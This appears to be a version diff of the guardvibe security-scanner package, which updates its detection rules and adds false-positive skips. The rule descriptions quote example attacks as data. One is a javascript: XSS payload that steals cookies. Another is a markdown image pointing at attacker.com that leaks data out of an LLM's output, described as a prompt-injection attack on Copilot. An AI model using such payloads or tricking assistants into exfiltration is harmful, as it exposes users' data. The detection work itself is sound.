guardvibe 3.0.53 → 3.0.55

package/build/data/rules/advanced-security.js

@@ -304,7 +304,7 @@ export const advancedSecurityRules = [
         severity: "medium",
         owasp: "A04:2025 Insecure Design",
         description: "Regular expression contains nested quantifiers ((a+)+), overlapping alternation with quantifiers (([a-z]+)*), or other patterns that cause catastrophic backtracking. Attackers can send crafted input to freeze the event loop.",
-        pattern: /\/(?:[^/\\\n]|\\.)*(?:\([^)\n]*[+*][^)\n]*\)\s*[+*]|\(\?:[^)\n]*[+*][^)\n]*\)\s*[+*])(?:[^/\\\n]|\\.)*\//g,
+        pattern: /\/(?:[^/\\\n]|\\.)*(?:\([^)\n]*[+*][^)\n]*\)[+*]|\(\?:[^)\n]*[+*][^)\n]*\)[+*])(?:[^/\\\n]|\\.)*\//g,
         languages: ["javascript", "typescript"],
         fix: "Rewrite the regex to avoid nested quantifiers. Use atomic groups or possessive quantifiers if available, or use the 'safe-regex' library to validate patterns.",
         fixCode: '// BAD: catastrophic backtracking\nconst re = /(a+)+$/;\n\n// GOOD: no nested quantifiers\nconst re = /a+$/;\n\n// GOOD: validate with safe-regex\nimport safe from "safe-regex";\nif (!safe(pattern)) throw new Error("Unsafe regex");',
@@ -395,7 +395,7 @@ export const advancedSecurityRules = [
         severity: "medium",
         owasp: "A07:2025 Cross-Site Scripting",
         description: "User-provided URL is used directly in an href attribute without checking for dangerous protocols. Attackers can inject javascript:alert(document.cookie) to execute XSS when the link is clicked.",
-        pattern: /href\s*=\s*\{(?:user|profile|author|post|comment|data|item|record)[\w.]*\.(?:url|website|link|href|homepage)\}/gi,
+        pattern: /href\s*=\s*\{(?:user|profile|author|post|comment|record|input|formData|payload)[\w.]*\.(?:url|website|link|href|homepage)\}/gi,
         languages: ["javascript", "typescript"],
         fix: "Validate that URLs start with https:// or http:// before using in href.",
         fixCode: '// BAD: XSS via javascript: protocol\n<a href={user.website}>{user.name}</a>\n\n// GOOD: protocol validation\nfunction safeHref(url: string): string {\n  try {\n    const parsed = new URL(url);\n    if (["http:", "https:"].includes(parsed.protocol)) return url;\n  } catch {}\n  return "#";\n}\n<a href={safeHref(user.website)}>{user.name}</a>',

package/build/data/rules/ai-security.js

@@ -189,7 +189,7 @@ export const aiSecurityRules = [
         severity: "high",
         owasp: "A02:2025 Injection",
         description: "LLM output containing markdown images is rendered without URL validation. Attackers can trick the model into outputting ![img](https://attacker.com/exfil?data=SENSITIVE_DATA) — the browser automatically fetches the URL, silently exfiltrating data. This was exploited against Microsoft 365 Copilot in 2025.",
-        pattern: /(?:dangerouslySetInnerHTML|innerHTML|v-html|marked|remark|rehype|unified|react-markdown)[\s\S]{0,300}?(?:message\.content|completion|output|response|aiResponse|result\.text)/gi,
+        pattern: /(?:dangerouslySetInnerHTML|innerHTML|v-html|<ReactMarkdown\b)[\s\S]{0,300}?(?:message\.content|completion|aiResponse|chatResponse|llmResponse|result\.text|generated_text|gpt[A-Z_]\w*|claude[A-Z_]\w*|openai\.\w+\.create)/g,
         languages: ["javascript", "typescript"],
         fix: "Sanitize LLM output before rendering as markdown. Strip or validate image URLs against an allowlist.",
         fixCode: '// Sanitize AI output before rendering markdown\nfunction sanitizeAIOutput(text: string): string {\n  // Remove markdown images with external URLs\n  return text.replace(/!\\[([^\\]]*)\\]\\(https?:\\/\\/[^)]+\\)/g, "[$1](link removed)");\n}\n\n// Or use a markdown renderer with image URL allowlist\n<ReactMarkdown\n  components={{\n    img: ({ src }) => ALLOWED_HOSTS.some(h => src?.startsWith(h)) ? <img src={src} /> : null\n  }}\n>{sanitizeAIOutput(aiResponse)}</ReactMarkdown>',

package/build/data/rules/payments.js

@@ -18,7 +18,7 @@ export const paymentRules = [
         severity: "critical",
         owasp: "A01:2025 Broken Access Control",
         description: "Stripe webhook endpoint processes events without verifying the webhook signature. Anyone can send fake payment events.",
-        pattern: /(?:\/api\/webhook|\/api\/stripe|webhook.*stripe)[\s\S]*?(?:req\.body|request\.json|JSON\.parse)[\s\S]{0,300}?(?![\s\S]{0,300}?(?:constructEvent|verifyHeader|stripe\.webhooks))/g,
+        pattern: /(?:\/api\/webhook|\/api\/stripe|webhook.*stripe)[\s\S]*?(?:req\.body|request\.json|JSON\.parse)[\s\S]{0,300}?(?![\s\S]{0,300}?(?:constructEvent|verifyHeader|stripe\.webhooks|svix\.verify|webhook\.verify|verify\w*Webhook|verifyWebhookSignature|wh\.verify|crypto\.timingSafeEqual))/g,
         languages: ["javascript", "typescript"],
         fix: "Always verify Stripe webhook signatures using stripe.webhooks.constructEvent().",
         fixCode: "// Verify webhook signature\nconst sig = request.headers.get('stripe-signature')!;\nconst event = stripe.webhooks.constructEvent(\n  body, sig, process.env.STRIPE_WEBHOOK_SECRET!\n);",

package/build/tools/check-code.js

@@ -25,17 +25,25 @@ function parseSuppressionsFromCode(lines) {
             // lines, stopping early at a blank line or a new comment block. This makes
             // suppress comments work for multi-line method chains (common Supabase / ORM
             // builders span 3-5 lines from `.from(...)` through `.select(...).order(...)`).
+            // Additional adjacent `guardvibe-ignore` comments are treated as part of the
+            // same header block (they don't break the suppression chain) so users can
+            // stack multiple rule suppressions above the same code.
             suppressions.push({ line: i + 1, ruleId });
-            for (let j = 1; j <= 5; j++) {
+            let codeLinesCovered = 0;
+            for (let j = 1; j <= 10 && codeLinesCovered < 5; j++) {
                 const nextLine = lines[i + j];
                 if (nextLine === undefined)
                     break;
                 const trimmed = nextLine.trim();
                 if (trimmed === "")
                     break;
-                if (/^\s*(?:\/\/|#|<!--)/.test(nextLine))
-                    break;
+                // Comment continuation lines (additional `guardvibe-ignore` directives or plain
+                // explanation comments below the directive) are part of the same header block —
+                // don't break the chain, but don't count them against the 5-line code budget.
+                if (/^\s*(?:\/\/|#|<!--|\*)/.test(nextLine))
+                    continue;
                 suppressions.push({ line: i + 1 + j, ruleId });
+                codeLinesCovered++;
             }
         }
         else {
@@ -225,6 +233,7 @@ const LEGITIMATE_PREFIXED_PACKAGES = new Set([
     "fast-glob", "fast-deep-equal", "fast-json-stable-stringify", "fast-json-stringify",
     "fast-xml-parser", "fast-diff", "fast-levenshtein", "fast-redact", "fast-check",
     "fast-uri", "fast-querystring", "fast-decode-uri-component", "fast-content-type-parse",
+    "fast-equals", "fast-fifo", "fast-shallow-equal", "fast-safe-stringify",
     "safe-array-concat", "safe-stable-stringify", "safe-buffer", "safe-regex",
     "safe-regex-test", "safe-push-apply",
     "simple-git", "simple-update-notifier", "simple-swizzle", "simple-concat",
@@ -357,7 +366,7 @@ export function analyzeCode(code, language, framework, filePath, configDir, rule
         // ── Context-aware rule skipping (pattern-agnostic) ──────────────
         const authRuleIds = new Set(["VG420", "VG952", "VG002", "VG402"]);
         const adminRoleRuleIds = new Set(["VG426", "VG957"]);
-        const rateLimitRuleIds = new Set(["VG956", "VG030"]);
+        const rateLimitRuleIds = new Set(["VG956", "VG030", "VG1004"]);
         const isWebhookRoute = filePath && /webhook/i.test(filePath);
         const isCronRoute = filePath && /(?:cron|scheduled|jobs?)\//i.test(filePath);
         const isAdminRoute = filePath && /\/admin\//i.test(filePath);
@@ -372,6 +381,34 @@ export function analyzeCode(code, language, framework, filePath, configDir, rule
                 /(?:app|router)\.use\s*\(\s*(?:[^,)]*,\s*)?\w*(?:[Ll]imiter|[Tt]hrottle|[Rr]ate[Ll]imit|[Ss]low[Dd]own|[Bb]rute)\w*\s*\)/.test(code);
             if (hasGlobalRateLimit)
                 continue;
+            // Per-route Next.js / Server Action pattern: file imports a rate-limiter factory and
+            // uses `.check(`/`.limit(` at call sites. Common in App Router route handlers and
+            // React Server Actions where there's no shared `app.use(...)` middleware.
+            const hasPerRouteRateLimit = /\b(?:createRateLimiter|createRedisRateLimiter|createSlidingWindow|Ratelimit\.slidingWindow|express-rate-limit|hono-rate-limiter|@upstash\/ratelimit)\b/.test(code) &&
+                /\b\w+\s*\.\s*(?:check|limit)\s*\(/.test(code);
+            if (hasPerRouteRateLimit)
+                continue;
+        }
+        // Skip VG1010 (Server Action without input validation) when the file uses a schema
+        // validator (zod / joi / yup / valibot) on its arguments. Rule fires at the file's
+        // 'use server' directive (line 1) but validation lives inside the function body.
+        if (rule.id === "VG1010") {
+            const hasSchemaValidation = /\b(?:z\.\w+|zod\.\w+|joi\.\w+|Joi\.\w+|yup\.\w+|valibot)/.test(code) &&
+                /\.\s*(?:parse|safeParse|validate|validateSync|parseAsync)\s*\(/.test(code);
+            if (hasSchemaValidation)
+                continue;
+        }
+        // Skip VG601 (Stripe Webhook Missing Signature Verification) when the file calls a
+        // webhook-verification function anywhere — Stripe's `constructEvent`, Svix-style
+        // `verifyPolarWebhook`/`verifyClerkWebhook`/`svix.verify`, or generic HMAC compare via
+        // `crypto.timingSafeEqual`. The base regex's negative lookahead only checks 300 chars
+        // *after* the body parse and misses the safer verify-then-parse ordering used by
+        // svix-style webhooks (verify raw bytes, parse only after).
+        if (rule.id === "VG601") {
+            const hasWebhookVerification = /\b(?:stripe\.webhooks\.constructEvent|svix\.verify|\w*\.\s*verify\s*\([^)]*signature|verify\w*Webhook|verifyWebhookSignature|wh\.verify)\b/.test(code) ||
+                /crypto\.timingSafeEqual\s*\(/.test(code);
+            if (hasWebhookVerification)
+                continue;
         }
         // Skip auth rules when code has any auth guard pattern (naming-agnostic)
         if (codeHasAuthGuard && authRuleIds.has(rule.id))
@@ -404,6 +441,11 @@ export function analyzeCode(code, language, framework, filePath, configDir, rule
         // do expose data still get flagged.
         if (rule.id === "VG1006" && isBatchScriptFile)
             continue;
+        // Skip VG1008 (Admin Role Elevation Without Authorization Check) in batch scripts —
+        // CLI scripts under scripts/ run by the operator at the terminal; there is no HTTP
+        // request handler to authorize. Rule still fires inside route handlers and Server Actions.
+        if (rule.id === "VG1008" && isBatchScriptFile)
+            continue;
         // Skip VG132 (Missing Request Body Size Limit) on Next.js route handlers and
         // pages/api endpoints — Next.js/Vercel apply a default 4.5MB body limit at the
         // platform layer, which is what the rule is checking for.
@@ -630,18 +672,20 @@ export function analyzeCode(code, language, framework, filePath, configDir, rule
             }
             // VG020 (wildcard dep version) on package.json: skip the `engines` block —
             // `"node": ">=18.0.0"` is a runtime constraint, not a dependency range.
+            // Also skip the `overrides` block — that's npm's mechanism for *forcing* a
+            // minimum transitive version (security tightening), not a loose dep range.
             if (rule.id === "VG020" && filePath && /package\.json$/.test(filePath)) {
-                let inEngines = false;
+                let inExemptBlock = false;
                 for (let j = lineNumber - 1; j >= Math.max(0, lineNumber - 6); j--) {
                     const prev = lines[j] ?? "";
-                    if (/"engines"\s*:\s*\{/.test(prev)) {
-                        inEngines = true;
+                    if (/"(?:engines|overrides|resolutions|pnpm)"\s*:\s*\{/.test(prev)) {
+                        inExemptBlock = true;
                         break;
                     }
                     if (/^\s*\}/.test(prev))
-                        break; // closed a previous block — not in engines
+                        break; // closed a previous block — not in exempt
                 }
-                if (inEngines)
+                if (inExemptBlock)
                     continue;
             }
             // Skip hardcoded-credential rules when the value is a human-readable sentence
@@ -670,6 +714,37 @@ export function analyzeCode(code, language, framework, filePath, configDir, rule
                 if (/\b[A-Z][A-Z0-9_]*\s*=\s*["']\d+["']/.test(matchedLine))
                     continue;
             }
+            // VG106 (Timing-Unsafe Secret Comparison): skip when one operand is a React useRef
+            // pattern (`*Ref.current`). Refs hold local component state, not user-provided input,
+            // so timing attacks don't apply — there's no remote attacker controlling the comparand.
+            if (rule.id === "VG106") {
+                const matchedLine = lines[lineNumber - 1] ?? "";
+                if (/\b\w*Ref\.current\b/.test(matchedLine))
+                    continue;
+            }
+            // VG126 (Dynamic RegExp from User Input): skip when the variable name signals it has
+            // already been escaped/sanitized (e.g. `escapedElement`, `safeQuery`, `sanitizedInput`).
+            if (rule.id === "VG126") {
+                const matchedLine = lines[lineNumber - 1] ?? "";
+                if (/\bnew\s+RegExp\s*\(\s*(?:escaped|escape\w*|sanitized|sanitiz\w*|safe[A-Z_]\w*|validated)\w*\b/.test(matchedLine))
+                    continue;
+            }
+            // VG1009 (Supabase ilike/like Pattern Injection): skip when the interpolated variable
+            // name signals it has already been escaped (e.g. `escaped`, `safeQuery`, `sanitized`).
+            if (rule.id === "VG1009") {
+                const matchedLine = lines[lineNumber - 1] ?? "";
+                if (/\$\{\s*(?:escaped|escape\w*|sanitized|sanitiz\w*|safe[A-Z_]\w*|validated)/.test(matchedLine))
+                    continue;
+            }
+            // VG426 (Missing Role Check on Admin Route): skip when the matched line is inside a
+            // JSDoc comment (`* GET /api/admin/...`) — the actual handler code below the doc block
+            // gets evaluated separately. Without this, every documented admin route fires twice
+            // (once on the doc-comment line, once on the handler).
+            if (rule.id === "VG426") {
+                const matchedLine = lines[lineNumber - 1] ?? "";
+                if (/^\s*\*\s/.test(matchedLine) || /^\s*\/\*\*/.test(matchedLine) || /^\s*\*\//.test(matchedLine))
+                    continue;
+            }
             // Skip VG010 (SQL injection) on Angular HTTP service calls — http.get/post/etc.
             // are HTTP client methods, not SQL. The existing pattern's `get` keyword catches them.
             if (rule.id === "VG010") {

package/build/tools/full-audit.js

@@ -69,7 +69,8 @@ function collectJsFiles(dir, maxFiles = 200) {
     const files = [];
     const config = loadConfig(resolve(dir));
     const skip = new Set([
-        "node_modules", ".git", ".next", "build", "dist", ".turbo", "coverage",
+        "node_modules", ".git", ".next", ".vercel", ".output", ".astro", ".svelte-kit",
+        "build", "dist", ".turbo", "coverage", ".nuxt", ".cache",
         ...config.scan.exclude,
     ]);
     // `maxFiles = Infinity` is the contract for full mode (CLI --full flag): scan everything.

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "guardvibe",
-  "version": "3.0.53",
+  "version": "3.0.55",
   "mcpName": "io.github.goklab/guardvibe",
   "description": "Security MCP for vibe coding. 365 rules, 36 tools, CLI + doctor. Host security, auth coverage mapping, LLM-powered deep scan (IDOR/business logic), taint analysis. Plus Next.js, Supabase, Clerk, Stripe, Prisma, tRPC, Hono, GraphQL, Convex, Turso, Uploadthing, AI SDK, and the full AI-generated stack.",
   "type": "module",